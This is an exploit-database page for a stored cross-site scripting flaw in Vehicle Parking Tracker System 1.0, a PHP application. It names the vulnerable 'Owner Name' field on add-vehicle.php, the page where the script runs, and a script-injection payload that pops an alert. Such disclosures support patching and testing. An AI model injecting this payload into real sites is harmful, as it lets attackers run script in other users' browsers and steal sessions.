[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Vehicle Parking Tracker System 1.0 - (Owner Name) Stored Cross-Site Scripting Vulnerability

Author
Anmol K Sachan
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-35768
Category
web applications
Date add
01-02-2021
Platform
php
# Exploit Title: Vehicle Parking Tracker System 1.0 - 'Owner Name'  Stored Cross-Site Scripting
# Exploit Author: Anmol K Sachan
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/
# Software: : Vehicle Parking Tracker System 
# Version : 1.0
# Vulnerability Type: Cross-site Scripting
# Tested on Windows 10 XAMPP
# This application is vulnerable to Stored XSS vulnerability.
# Vulnerable script:

1) http://localhost/vpms/add-vehicle.php
# Vulnerable parameters: 'Owner Name'
# Payload used: ()"><script>alert(‘document.cookie’)</script>
# POC: manage-incomingvehicle.php
# You will see your Javascript code executed.

#  0day.today [2024-11-15]  #